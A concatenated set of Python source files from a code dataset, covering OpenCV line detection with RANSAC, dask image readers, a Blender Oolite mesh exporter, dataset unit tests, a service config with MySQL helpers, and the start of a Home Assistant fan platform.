Point (x1, y1) = \" + \"(\" + str(int(roi[0]+roi[2])) + \", \" + str(int(roi[1]+roi[3])) + \")\")\n \n # Opens a new window and displays the input frame\n width = int(frame.shape[1] * scale_percent / 100)\n height = int(frame.shape[0] * scale_percent / 100)\n dim = (width, height)\n # resize image\n resized = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\n cv2.imshow(\"input\", resized)\n\n # Converts each frame to grayscale - we previously only converted the first frame to grayscale\n imCrop = frame[int(roi[1]):int(roi[1]+roi[3]), int(roi[0]):int(roi[0]+roi[2]), ...]\n copy_imCrop = imCrop.copy()\n # cv2.imshow(\"Current Cropped Frame\", imCrop)\n gray_imCrop = cv2.cvtColor(copy_imCrop, cv2.COLOR_BGR2GRAY)\n\n # binary image\n ret, thresh1 = cv2.threshold(gray_imCrop, 127, 255, cv2.THRESH_BINARY)\n # print(thresh1)\n \n # draw the reference lines\n # horizontal direction\n # every 3 pixels gets a line\n # calculate the number of lines in horizontal and vertical directions\n nH = np.int0(roi[3] / 3)\n nW = np.int0(roi[2] / 3)\n # get the samples of lines in H- and V directions\n hLine = np.array([])\n vLine = np.array([])\n\n # horizontal direction\n # initialize the cordinates of all sample points in H- direction\n hCoor = np.empty((0, 2), int)\n xPlus1HLine = np.array([]) # f(x+1) for calculate the gradient, \n for i in range(nH):\n # calculate the gradient of each line\n hLine = thresh1[i*3, :] # f(x)\n xPlus1HLine = np.concatenate(([hLine[0]], hLine[0: -1])) # f(x+1)\n hD = xPlus1HLine - hLine # d = f(x+1) - f(x)\n hRes = [idx for idx, val in enumerate(hD) if val != 0] # index of non-zero value\n hSubCoor = np.zeros((len(hRes), 2)) # initialize the sample points for each line\n for idx, val in enumerate(hRes): # coordinate\n hSubCoor[idx][0] = val # x\n hSubCoor[idx][1] = i*3 # y\n hCoor = np.concatenate((hCoor, hSubCoor), axis=0)\n \n # linear model estimation using RANSAC\n XHCoor = hCoor[:, 0]\n TXHCoor = XHCoor.reshape(-1, 1)\n yHCoor = hCoor[:, 1] \n\n # Robustly fit linear model with RANSAC algorithm\n hRansac = linear_model.RANSACRegressor()\n hRansac.fit(TXHCoor, yHCoor)\n hInlierMask = hRansac.inlier_mask_\n hOutlierMask = np.logical_not(hInlierMask)\n\n # Predict data of estimated models\n XHLine = np.arange(TXHCoor.min(), TXHCoor.max())[:, np.newaxis]\n yHLineRansac = hRansac.predict(XHLine)\n hX0 = np.int0(XHLine[0][0])\n hy0 = np.int0(yHLineRansac[1])\n hX1 = np.int0(XHLine[-1][0])\n hy1 = np.int0(yHLineRansac[-1])\n\n # Estimated coefficients\n # print(\"Estimated RANSAC coefficients: \" + float(ransac.estimator_.coef_))\n\n # Draw line\n hColor = (0, 255, 0)\n cv2.line(copy_imCrop, (hX0, hy0), (hX1, hy1), hColor, 2)\n\n \n # vertical direction\n # initialize the cordinates of all sample points in V- direction\n vCoor = np.empty((0, 2), float)\n xPlus1VLine = np.array([]) # f(x+1) for calculate the gradient, \n for i in range(nW):\n # calculate the gradient of each line\n vLine = thresh1[:, i*3] # f(x)\n xPlus1VLine = np.concatenate(([vLine[0]], vLine[0: -1])) # f(x+1)\n vd1 = xPlus1VLine - vLine # d = f(x+1) - f(x)\n vRes = [idx for idx, val in enumerate(vd1) if val != 0] # index of non-zero value\n vSubCoor = np.zeros((len(vRes), 2)) # initialize the sample points for each line\n for idx, val in enumerate(vRes): # coordinate\n vSubCoor[idx][0] = i*3 # y\n vSubCoor[idx][1] = val # x\n vCoor = np.concatenate((vCoor, vSubCoor), axis=0)\n\n # linear model estimation using RANSAC\n XVCoor = vCoor[:, 0]\n TXVCoor = XVCoor.reshape(-1, 1)\n yVCoor = vCoor[:, 1]\n\n # 
Robustly fit linear model with RANSAC algorithm\n vRansac = linear_model.RANSACRegressor()\n vRansac.fit(TXVCoor, yVCoor)\n vInlierMask = vRansac.inlier_mask_\n vOutlierMask = np.logical_not(vInlierMask)\n\n # Predict data of estimated models\n XVLine = np.arange(TXVCoor.min(), TXVCoor.max())[:, np.newaxis]\n yVLineRansac = vRansac.predict(XVLine)\n vX0 = np.int0(XVLine[0][0])\n vy0 = np.int0(yVLineRansac[1])\n vX1 = np.int0(XVLine[-1][0])\n vy1 = np.int0(yVLineRansac[-1])\n\n # Estimated coefficients\n # print(\"Estimated RANSAC coefficients: \" + float(ransac.estimator_.coef_))\n\n # Draw line\n vColor = (255, 0, 0)\n cv2.line(copy_imCrop, (vX0, vy0), (vX1, vy1), vColor, 2)\n\n '''\n # Calculate the intersection point\n # iP = lineLineIntersection([hX0, hy0], [hX1, hy1], [vX0, vy0], [vX1, vy1])\n \n # Line AB represented as m1x + b1 = y\n m1 = (hy1 - hy0)/(hX1 - hX0)\n b1 = hy1 - m1 * hX1\n \n # Line CD represented as m2x + b2 = y\n m2 = (vy1 - vy0)/(hX1 - hX0)\n b2 = vy1 - m2 * vX1 \n\n xi = (b1-b2) / (m2-m1)\n yi = m1 * xi + b1\n \n # print(\"[\" + str(xi) + \", \" + str(yi) + \"]\")\n cv2.rectangle(copy_imCrop, (np.int0(xi) - 2, np.int0(yi) - 2), (np.int0(xi) + 2, np.int0(yi) + 2), (0, 128, 255), -1)\n \n\n if ii == 1:\n y0 = yi\n ydisp_global = y0 - yi\n ydisp_global_plot = np.append(ydisp_global_plot, ydisp_global) \n ''' \n \n cv2.imshow(\"IntersectionPoint is Detected\", np.hstack([imCrop, copy_imCrop]))\n \n # Frames are read by intervals of 1 millisecond. The programs breaks out of the while loop when the user presses the 'q' key\n k = cv2.waitKey(30) & 0xff\n if k == ord('q'):\n break\n elif k == ord('s'):\n cv2.imwrite('SquareMatching' + str(ii) + '.png', copy_imCrop)\n # index of frame\n else:\n break\n\nnp.savetxt('data_I_S_47.csv', ydisp_global_plot, delimiter=',')\n'''\n# plot-yflow\nplt.plot(ydisp_global_plot)\n# plt.axis([0, 700, -5, 30]) # 48\nplt.ylabel('Displcement (pixels)')\nplt.xlabel('Time (Frame)')\nplt.title('Vertical Displacement')\nplt.savefig('I_vDisp_47.png')\nplt.show()\n'''\n# The following frees up resources and closes all windows\ncap.release()\ncv2.destroyAllWindows()","sub_path":"LinesDetectionFourCornersDetection_woO.py","file_name":"LinesDetectionFourCornersDetection_woO.py","file_ext":"py","file_size_in_byte":7548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"83654935","text":"import logging\r\n\r\nimport dask.array as da\r\nfrom dask.distributed import get_client\r\nfrom dask import delayed\r\n\r\n__all__ = [\"read_h5\", \"read_nifti\", \"read_tiff\"]\r\n\r\nlogger = logging.getLogger(\"segmentation.pipeline.tasks\")\r\n\r\n\r\ndef read_h5(uri, path=\"/\"):\r\n import h5py\r\n\r\n client = get_client()\r\n with h5py.File(uri, \"r\") as h:\r\n data = da.from_array(h[path], chunks=\"auto\")\r\n data = client.persist(data)\r\n\r\n return data\r\n\r\n\r\ndef read_nifti(uri):\r\n import SimpleITK as sitk\r\n\r\n data = sitk.ReadImage(uri)\r\n data = sitk.GetArrayFromImage(data)\r\n\r\n client = get_client()\r\n data = da.from_array(data, chunks=\"auto\")\r\n\r\n return data\r\n\r\n\r\ndef read_tiff(uri):\r\n import imageio\r\n\r\n data = imageio.volread(uri)\r\n\r\n client = get_client()\r\n data = da.from_array(data, chunks=\"auto\")\r\n\r\n return data\r\n","sub_path":"segmentation/pipeline/tasks/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"510339153","text":"#!BPY\n\n\"\"\"\nName 'Oolite DAT'\nBlender: 263\nGroup: 'Export'\nTooltip 'Oolite mesh exporter'\n\"\"\"\n\nbl_info = {\n\t\"name\":\t\t\"Oolite (.dat)\",\n\t\"author\":\t\"Ben Merritt\",\n\t\"blender\":\t(2,6,3),\n\t\"version\":\t(0,0,1),\n\t\"location\":\t\"File > Import-Export\",\n\t\"description\": \"Exports the selected mesh to an Oolite .dat file\",\n\t\"category\": \"Import-Export\",\n}\n\n# TODO:\n# * Material/texture support\n\nimport os.path\n#from types import *\n\nimport bpy\nimport mathutils\n\n# Converts vectors in Blender's coordinate system to Oolite's coordinate system\ndef convertCoords(vec):\n\treturn mathutils.Vector((vec.x, vec.z, -vec.y))\n\ndef formatVector(vec):\n\treturn \"{},{},{}\".format(vec.x, vec.y, vec.z)\n\ndef formatTex(tc):\n\treturn \"{} {}\".format(vec.x, vec.y)\n\nclass Exporter(object):\n\tdef __init__(self, filename):\n\t\tself.filename = filename\n\t\t# Mesh data to be written out\n\t\tself.verts_out = []\n\t\tself.norms_out = []\n\t\tself.faces_out = []\n\t\tself.uvs_out = []\n\t\t# Keeps track of smooth verts' indices in verts_out so we can share them between\n\t\t# faces\n\t\tself.written_smooth_verts = {}\n\n\t# TODO: break up into smaller methods.\n\tdef write(self):\n\t\tobject = bpy.context.active_object\n\t\tif object.type != \"MESH\":\n\t\t\traise Exception(\"Invalid active object; must be a mesh\")\n\n\t\t# Write mesh data.\n\t\tverts = []\n\t\tnormals = []\n\n\t\t# Apply modifiers.\n\t\tmesh = object.to_mesh(bpy.context.scene, True, \"PREVIEW\")\n\n\t\ttry:\n\t\t\tfor v in mesh.vertices:\n\t\t\t\tverts.append(convertCoords(v.co))\n\t\t\t\tnormals.append(convertCoords(v.normal))\n\n\t\t\tuvs = None\n\n\t\t\tif len(mesh.tessface_uv_textures) > 0:\n\t\t\t\tuvs = mesh.tessface_uv_textures[0]\n\n\t\t\tfor face in mesh.tessfaces:\n\t\t\t\tface_out = []\n\t\t\t\ttex_name = None\n\t\t\t\tif uvs is not None:\n\t\t\t\t\ttex_name = os.path.basename(uvs.data[face.index].image.filepath)\n\t\t\t\t\tif tex_name is None:\n\t\t\t\t\t\traise Exception(\"Face with missing texture\")\n\n\t\t\t\tdef writeTri(vertex_numbers):\n\t\t\t\t\ttri_out = \",\".join((str(face_out[vn]) for vn in vertex_numbers))\n\t\t\t\t\tself.faces_out.append(\"0,0,0 {} 3,{}\\n\".format(formatVector(convertCoords(face.normal)), tri_out))\n\t\t\t\t\tif uvs is not None:\n\t\t\t\t\t\tface_uvs = uvs.data[face.index].uv\n\t\t\t\t\t\t# Formats UV coords for each face (\"v1x,v1y v2x,v2y ...\")\n\t\t\t\t\t\tuv_out = \" \".join(\",\".join((str(coord) for coord in (face_uvs[vn]))) for vn in vertexNumbers)\n\t\t\t\t\t\tself.uvs_out.append(\"{} 1.0,1.0 {}\\n\".format(texName, uv_out))\n\n\t\t\t\tfor vert_num in face.vertices:\n\t\t\t\t\t# TODO: rename to vert_num_out?\n\t\t\t\t\tvert_out = None\n\t\t\t\t\tif(face.use_smooth):\n\t\t\t\t\t\tif vert_num in written_smooth_verts:\n\t\t\t\t\t\t\tvert_out = writtenSmoothVerts[vert_num]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tvert_out = len(self.verts_out)\n\t\t\t\t\t\t\twritten_smooth_verts[vert_num] = vert_out\n\t\t\t\t\t\t\tself.verts_out.append(formatVector(verts[vert_num]) + \"\\n\")\n\t\t\t\t\t\t\tself.norms_out.append(formatVector(normals[vert_num]) + \"\\n\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tvert_out = len(self.verts_out)\n\t\t\t\t\t\tself.verts_out.append(formatVector(verts[vert_num]) + \"\\n\")\n\t\t\t\t\t\tself.norms_out.append(formatVector(convertCoords(face.normal)) + \"\\n\")\n\t\t\t\t\tface_out.append(vert_out)\n\n\t\t\t\twriteTri([2, 1, 0])\n\t\t\t\t#If this is a quad, add another triangle to fill it out.\n\t\t\t\tif 
len(face_out) == 4:\n\t\t\t\t\twriteTri([0, 3, 2])\n\t\tfinally:\n\t\t\t# Remove the temporary mesh.\n\t\t\tbpy.data.meshes.remove(mesh)\n\n\t\twith open(self.filename, 'w') as out:\n\t\t\tout.write(\"NVERTS %d\\n\" % len(self.verts_out))\n\t\t\tout.write(\"NFACES %d\\n\" % len(self.faces_out))\n\n\t\t\tout.write(\"VERTEX\\n\")\n\t\t\tout.writelines(self.verts_out)\n\n\t\t\tout.write(\"FACES\\n\")\n\t\t\tout.writelines(self.faces_out)\n\n\t\t\tif uvs is not None:\n\t\t\t\tout.write(\"TEXTURES\\n\")\n\t\t\t\tout.writelines(uvs_out)\n\n\t\t\tout.write(\"NORMALS\\n\")\n\t\t\tout.writelines(self.norms_out)\n\n\t\t\tout.write(\"END\\n\")\n\nclass ExportOperator(bpy.types.Operator):\n\t\"\"\"Exporter for Oolite .dat meshes\"\"\"\n\tbl_idname = \"export.oolite_dat\"\n\tbl_label = \"Export Oolite .dat mesh\"\n\tbl_options = {'PRESET'}\n\n\tfilename_ext = \".dat\"\n\n\tfilepath = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n\n\t@classmethod\n\tdef poll(cls, context):\n\t\treturn True\n\n\tdef execute(self, context):\n\t\t# TODO: put all the write code in here.\n\t\tExporter(self.filepath).write()\n\t\treturn {'FINISHED'}\n\n\tdef invoke(self, context, event):\n\t\tcontext.window_manager.fileselect_add(self)\n\t\treturn {'RUNNING_MODAL'}\n\ndef menu_func(self, context):\n\tself.layout.operator_context = 'INVOKE_DEFAULT'\n\tself.layout.operator(ExportOperator.bl_idname, text=\"Oolite (.dat)\")\n\ndef register():\n\tbpy.utils.register_class(ExportOperator)\n\tbpy.types.INFO_MT_file_export.append(menu_func)\n\ndef unregister():\n\tbpy.utils.unregister_class(Exporter)\n\tbpy.types.INFO_MT_file_export.remove(menu_func)\n\nif __name__ == \"__main__\":\n\tregister()\n","sub_path":"Blender/export_oolite.py","file_name":"export_oolite.py","file_ext":"py","file_size_in_byte":4590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"556891785","text":"import os\n\nimport unittest\nimport tempfile\nimport json\n\nimport gcsdataset\n\n# A minimally small valid jpeg file\nimg = b'\\xff\\xd8\\xff\\xdb\\x00C\\x00\\x03\\x02\\x02\\x02\\x02\\x02\\x03\\x02\\x02\\x02\\x03\\x03\\x03\\x03\\x04\\x06\\x04\\x04\\x04\\x04\\x04\\x08\\x06\\x06\\x05\\x06\\t\\x08\\n\\n\\t\\x08\\t\\t\\n\\x0c\\x0f\\x0c\\n\\x0b\\x0e\\x0b\\t\\t\\r\\x11\\r\\x0e\\x0f\\x10\\x10\\x11\\x10\\n\\x0c\\x12\\x13\\x12\\x10\\x13\\x0f\\x10\\x10\\x10\\xff\\xc9\\x00\\x0b\\x08\\x00\\x01\\x00\\x01\\x01\\x01\\x11\\x00\\xff\\xcc\\x00\\x06\\x00\\x10\\x10\\x05\\xff\\xda\\x00\\x08\\x01\\x01\\x00\\x00?\\x00\\xd2\\xcf \\xff\\xd9'\n\n\nclass TestGCSDataset(unittest.TestCase):\n def setUp(self):\n self.dirs = [\"a\", \"b\"]\n self.directory = tempfile.TemporaryDirectory()\n self.dirname = self.directory.name\n self.count = 0\n self.paths = []\n for key in self.dirs:\n # create the dir/${label}/file.JPEG structure\n path = os.path.join(self.dirname, key)\n os.makedirs(path)\n self.count += 1\n fname = os.path.join(path, \"file.JPEG\")\n with open(fname, \"wb\") as f:\n f.write(img)\n self.paths.append(fname)\n\n def tearDown(self):\n self.directory.cleanup()\n\n def test_make_dataset(self):\n ds = gcsdataset.make_dataset(\n self.paths, extensions=(\".JPEG\",))\n self.assertEqual(len(ds), self.count,\n \"Expected {} items got {}\".format(self.count, len(ds)))\n\n\nclass TestImageFolder(unittest.TestCase):\n def setUp(self):\n self.classes_to_idx = {b\"a\": 0, b\"b\": 1}\n self.directory = tempfile.TemporaryDirectory()\n self.dirname = self.directory.name.encode('utf-8')\n self.count = 0\n self.paths = []\n for key in 
self.classes_to_idx.keys():\n # create the dir/${label}/file.JPEG structure\n path = os.path.join(self.dirname, key)\n os.makedirs(path)\n self.count += 1\n fname = os.path.join(path, b\"file.JPEG\")\n with open(fname, \"wb\") as f:\n f.write(img)\n self.paths.append(fname.decode('utf-8'))\n self.paths.sort()\n\n def tearDown(self):\n self.directory.cleanup()\n\n def test_image_folder(self):\n ds = gcsdataset.ImageFolder(root=self.directory.name)\n vals = list(ds)\n self.assertEqual(len(vals), self.count,\n \"Expected {} items got {}\".format(self.count, len(vals)))\n\n def test_index_cache(self):\n index_path = os.path.join(self.directory.name, \"vals.json\")\n ds = gcsdataset.ImageFolder(\n root=self.directory.name, index_path=index_path)\n self.assertTrue(os.path.exists(index_path), \"Index path exists\")\n # Bad test practice here: verify cache data is expected structure\n with open(index_path) as f:\n paths = json.loads(f.read())\n self.assertEqual(paths, self.paths)\n\n\nclass TestTrainScript(unittest.TestCase):\n def test_import_train_script(self):\n import test_train_mp_imagenet\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_gcsdataset.py","file_name":"test_gcsdataset.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"613174484","text":"\"\"\"Contain all config setting for module\nmachine learning\n\"\"\"\n\n\nimport os\nimport sqlite3\nimport json\nfrom datetime import datetime\n\nimport MySQLdb\n\n\nBASEDIR = os.path.abspath(os.path.dirname(__file__))\n\n\nMODEL_CURVES_REG = os.path.join(BASEDIR, 'files', 'curves_reg')\n\n\nMODEL_CURVES_CLF = os.path.join(BASEDIR, 'files', 'curves_clf')\n\n\nMODEL_ANFIS = os.path.join(BASEDIR, 'files', 'anfis')\n\n\nMODEL_CRP = os.path.join(BASEDIR, 'files', 'crp')\n\n\nSQLITE_PATH = os.path.join(BASEDIR, 'files', 'wipm-dev.db')\n\n\nROUTES = {\n 'TRAIN_REGRESSION': '/wipm/regression/model',\n 'PREDICT_REGRESSION': '/wipm/regression/predict',\n\n 'TRAIN_CLASSIFICATION': '/wipm/classification/model',\n 'PREDICT_CLASSIFICATION': '/wipm/classification/predict',\n\n 'TRAIN_CRP': '/wipm/crp/model',\n 'PREDICT_CRP': '/wipm/crp/predict',\n 'ANFIS': '/wipm/anfis/predict',\n 'DELETE_MODEL': '/wipm/models',\n\n 'GET_RESULT_TRAIN': '/wipm/result/train',\n 'GET_RESULT_PREDICT': '/wipm/result/predict',\n 'GET_ALL_MODEL': '/wipm/models',\n}\n\n\nBROKER = {\n 'TOPIC_JOBS': '/wi-ml/jobs',\n 'USERNAME': 'wi-ml',\n 'PASSWORD': '123456',\n 'PROTOCOLS': 'websockets',\n}\n\n\nWIPM_CLIENT = {\n 'ID': 'wipm',\n 'HOST': '127.0.0.1',\n 'PORT': 1883,\n 'QOS': 2,\n}\n\n\nML_CLIENT = {\n 'ID': 'ml_service',\n 'HOST': '127.0.0.1',\n 'PORT': 1883,\n 'QOS': 2,\n}\n\ndb = MySQLdb.connect('localhost', 'wipm', '', 'wipm')\ncur = db.cursor()\n\ndef get_now():\n return datetime.now().strftime(('%Y-%m-%d %H:%M:%S'))\n\ndef store_train_result(model_id, result):\n global cur\n global db \n sql = \"SELECT id FROM train WHERE model_id='%s'\" % model_id \n cur.execute(sql)\n instance = cur.fetchone()\n if instance is None:\n sql = \"INSERT INTO train(model_id, result) VALUES ('%s','%s')\" % (model_id, json.dumps(result))\n cur.execute(sql)\n else: \n sql = \"UPDATE train SET result='%s' WHERE model_id='%s'\" % (json.dumps(result), model_id)\n cur.execute(sql)\n db.commit()\n\ndef del_train_result(model_id):\n global cur\n global db \n sql = \"DELETE FROM train WHERE model_id='%s'\" % model_id \n cur.execute(sql)\n db.commit()\n\ndef store_predict_result(model_id, 
result):\n global cur\n global db \n sql = \"SELECT id FROM predict WHERE model_id='%s'\" % model_id\n cur.execute(sql)\n instance = cur.fetchone()\n if instance is None:\n sql = \"INSERT INTO predict(model_id, result) VALUES ('%s','%s')\" % (model_id, json.dumps(result))\n cur.execute(sql)\n else: \n sql = \"UPDATE predict SET result='%s' WHERE model_id='%s'\" % (json.dumps(result), model_id)\n cur.execute(sql)\n db.commit()\n","sub_path":"service/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"303713311","text":"import pytest\nimport os\n\n\n@pytest.fixture\ndef default_exporter():\n from environment.Battlesnake.exporter.Exporter import Exporter\n return Exporter(output_folder=\"replay_test\")\n\n@pytest.fixture\ndef basic_exporter():\n from environment.Battlesnake.exporter.Exporter import Exporter\n return Exporter(output_folder=\"replay_test\", file_name=\"test.replay\")\n\n@pytest.fixture\ndef sample_env():\n from agents.RandomAgent import RandomAgent\n from agents.SimpleAgent_solution import SimpleAgent\n from environment.battlesnake_environment import BattlesnakeEnvironment\n \n agents = [RandomAgent(), SimpleAgent()]\n env = BattlesnakeEnvironment(\n width=15,\n height=15,\n agents=agents,\n act_timeout=0.2\n )\n env.reset()\n return env\n\ndef test_directory_created(basic_exporter):\n assert os.path.exists(\"replay_test\")\n\ndef test_game_info(basic_exporter):\n from environment.Battlesnake.model.GameInfo import GameInfo\n g = GameInfo(game_id=\"test\", ruleset_name=\"standard\", ruleset_version=\"1.0.0\", timeout=500)\n basic_exporter.add_initial_state(game_info=g)\n basic_exporter.write_replay_to_file()\n\n expected = str({\"game\": g.export_json(), \"total_turns\": 0, \"moves\": []}).replace(\"'\", '\"')\n with open(\"replay_test/test.replay\", \"r\", encoding=\"utf-8\") as f:\n result = f.read()\n\n print(expected)\n print(result)\n assert expected == result\n os.unlink(\"replay_test/test.replay\")\n\ndef test_board_state_write(basic_exporter):\n from environment.Battlesnake.model.GameInfo import GameInfo\n from environment.Battlesnake.modes.Standard import StandardGame\n from environment.Battlesnake.model.Snake import Snake\n\n g = GameInfo(game_id=\"test\", ruleset_name=\"standard\", ruleset_version=\"1.0.0\", timeout=400)\n basic_exporter.add_initial_state(game_info=g)\n \n game = StandardGame()\n game.create_initial_board_state(width=15, height=15, snake_ids=[\"1\", \"2\"])\n basic_exporter.add_latest_game_step(game)\n basic_exporter.write_replay_to_file()\n\n expected = str({\"game\": g.export_json(), \"total_turns\": 1, \"moves\": [{\n \"height\": 15,\n \"width\": 15,\n \"food\": [f.export_json() for f in game.state.food],\n \"snakes\": [s.export_json() for s in game.state.all_snakes]\n }]}).replace(\"'\", '\"').replace(\"None\", \"null\").replace(\"(\", \"[\").replace(\")\", \"]\")\n\n \n with open(\"replay_test/test.replay\", \"r\") as f:\n result = f.read()\n\n assert expected == result\n os.unlink(\"replay_test/test.replay\")\n\ndef test_full_replay_cycle():\n from environment.battlesnake_environment import BattlesnakeEnvironment\n from agents.RandomAgent import RandomAgent\n from environment.Battlesnake.importer.Importer import Importer\n from environment.Battlesnake.renderer.game_renderer import GameRenderer\n\n agents = [RandomAgent(), RandomAgent()]\n\n env = BattlesnakeEnvironment(\n width=15,\n height=15,\n agents=agents,\n 
act_timeout=0.1,\n export_games=True\n )\n\n env.reset()\n\n while not env.game.is_game_over():\n env.step()\n\n assert os.path.exists(env.exporter.outpath)\n assert os.path.getsize(env.exporter.outpath) > 0\n game, turns, move_list = Importer.load_replay_file(env.exporter.outpath)\n\n width, height = move_list[0].width, move_list[0].height\n num_snakes = len(move_list[0].snakes)\n\n renderer = GameRenderer(width, height, num_snakes)\n\n assert len(move_list) >= 1\n assert len(move_list) == turns\n assert game\n\n for move in move_list:\n renderer.display(move)\n \n os.unlink(env.exporter.outpath)\n\n # TODO: Could be moved to a special place, so that it always runs at the end\n import shutil\n shutil.rmtree(\"replays\", ignore_errors=True)\n shutil.rmtree(\"replay_test\", ignore_errors=True)","sub_path":"environment/Battlesnake/tests/test_exporter.py","file_name":"test_exporter.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"403322956","text":"#!/usr/bin/python\n#/*Copyright (c) 2013 Chris Knorowski \n# *\n__author__ = 'cknorow@gmail.com (Chris knorowski)'\n\n\nimport sys\nimport string\nimport datetime\nimport logging\n\nimport webapp2\nfrom google.appengine.ext import db\n\nfrom grab_rate import currency as cryptsy\nfrom grab_rate import coinbasebtc\nfrom grab_rate import mtgoxbtc\n\n\nfrom models import BTCurrency\nfrom models import AltCurrency\nimport util\n\n#Workhorse class scrapes currency info and stores it into database\nclass WorkHorse:\n def __init__(self, Label, key_name, debug=False, write_database = False):\n #grab values from memcache\n self.write_database = write_database\n self.BTCurrency = util.get_btc()\n self.AltCurrency = util.get_alt_data(key_name, write_database)\n self.key_name=key_name\n if (self.BTCurrency is None):\n logging.error(\"BTCurrency does not exist\")\n if len(list(set(self.AltCurrency.get_by_key_name(key_name).currency).symmetric_difference(set(Label)))) != 0:\n self.write_database = True\n self.adjust_database(Label)\n\n\n #update the stored currency list in the database\n def adjust_database(self, Label):\n self.AltCurrency = util.get_alt_data(self.key_name, datastore=True)\n self.AltCurrency.currency = Label\n self.AltCurrency.put()\n\n #check and see if the prices were actually updated\n def check(self, updated, last, s = False):\n for i,j in enumerate(updated):\n try:\n if j == \"noupdate\":\n updated[i] = last[i]\n except:\n updated[i] = 0.0\n if s:\n updated[i] = ''\n return updated\n\n #update mtgox and coinbase prices\n def update_btc_prices(self):\n # Get coinbase btc price\n self.BTCurrency.price = self.check([coinbasebtc(),mtgoxbtc()],[0.0,0.0])\n self.BTCurrency.timestamp = datetime.datetime.now()\n self.BTCurrency.put()\n\n #Scrape and update prices\n def update_prices(self):\n # Get the altcoin prices from cryptsy \n pricealts = []\n marketalts = []\n volumealts = []\n time_to_sell = []\n weighted_buy = []\n weighted_sell = []\n\n for coin in self.AltCurrency.currency:\n market, price, volume, to_sell, ws, wb = cryptsy(coin)\n marketalts.append(market)\n pricealts.append(price)\n volumealts.append(volume)\n time_to_sell.append(to_sell)\n weighted_buy.append(wb)\n weighted_sell.append(ws)\n \n self.AltCurrency.marketname = self.check(marketalts,self.AltCurrency.marketname, s =True)\n self.AltCurrency.price = self.check(pricealts,self.AltCurrency.price)\n self.AltCurrency.volume = self.check(volumealts,self.AltCurrency.volume)\n 
self.AltCurrency.time_to_sell = self.check(time_to_sell,self.AltCurrency.time_to_sell)\n self.AltCurrency.weighted_buy = self.check(weighted_buy,self.AltCurrency.weighted_buy)\n self.AltCurrency.weighted_sell = self.check(weighted_sell,self.AltCurrency.weighted_sell)\n self.AltCurrency.timestamp = datetime.datetime.now()\n self.AltCurrency.put()\n #update the memcache after we write specifically to the database\n if self.write_database:\n AltCurrency = util.get_alt_data(self.key_name)\n AltCurrency = self.AltCurrency\n AltCurrency.put()\n\n\n","sub_path":"web/workhorse.py","file_name":"workhorse.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"506747731","text":"import os\r\nimport xlwt\r\n\r\ndir_ben = 'E:/data/benign'\r\ndir_mal = 'E:/data/malignant'\r\nf = xlwt.Workbook()\r\nsheet1 = f.add_sheet('test', cell_overwrite_ok= False)\r\nnum = 0\r\nfor files in os.listdir(dir_ben):\r\n if os.path.isdir(os.path.join(dir_ben, files)):\r\n sheet1.write(num, 0, files + '.jpg')\r\n sheet1.write(num, 1, '0')\r\n num += 1\r\n\r\nfor files in os.listdir(dir_mal):\r\n if os.path.isdir(os.path.join(dir_mal, files)):\r\n sheet1.write(num, 0, files + '.jpg')\r\n sheet1.write(num, 1, '1')\r\n num += 1 \r\n\r\nf.save('label.xls')","sub_path":"old_project/project/imgPre/fold2excel.py","file_name":"fold2excel.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"41000848","text":"\"\"\"Platform for fan integration.\"\"\"\nimport asyncio\nimport logging\nfrom functools import partial\n\nimport homeassistant.helpers.config_validation as cv\nimport voluptuous as vol\nfrom homeassistant.components import fan\nfrom homeassistant.components.fan import (\n ATTR_SPEED, \n PLATFORM_SCHEMA,\n SPEED_HIGH, \n SPEED_LOW, \n SPEED_MEDIUM,\n SPEED_OFF, \n SUPPORT_OSCILLATE,\n SUPPORT_SET_SPEED, \n FanEntity)\nfrom homeassistant.const import CONF_HOST, CONF_NAME, CONF_TOKEN\nfrom homeassistant.exceptions import PlatformNotReady\nfrom homeassistant.util import color\nfrom miio.device import Device\nfrom miio.exceptions import DeviceException\nfrom miio.miot_device import MiotDevice\n\nfrom . 
import GenericMiotDevice, ToggleableMiotDevice\nfrom .deps.const import (\n DOMAIN,\n CONF_UPDATE_INSTANT,\n CONF_MAPPING,\n CONF_CONTROL_PARAMS,\n CONF_CLOUD,\n CONF_MODEL,\n ATTR_STATE_VALUE,\n ATTR_MODEL,\n ATTR_FIRMWARE_VERSION,\n ATTR_HARDWARE_VERSION,\n SCHEMA,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nDEFAULT_NAME = \"Generic MIoT fan\"\nDATA_KEY = \"fan.\" + DOMAIN\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\n # {\n # vol.Required(CONF_HOST): cv.string,\n # vol.Required(CONF_TOKEN): vol.All(cv.string, vol.Length(min=32, max=32)),\n # vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n # vol.Optional(CONF_UPDATE_INSTANT, default=True): cv.boolean,\n # vol.Optional(CONF_CLOUD): vol.All(),\n \n # vol.Required(CONF_MAPPING):vol.All(),\n # vol.Required(CONF_CONTROL_PARAMS):vol.All(),\n\n # }\n SCHEMA\n)\n\n# pylint: disable=unused-argument\n@asyncio.coroutine\ndef async_setup_platform(hass, config, async_add_devices, discovery_info=None):\n \"\"\"Set up the fan from config.\"\"\"\n\n if DATA_KEY not in hass.data:\n hass.data[DATA_KEY] = 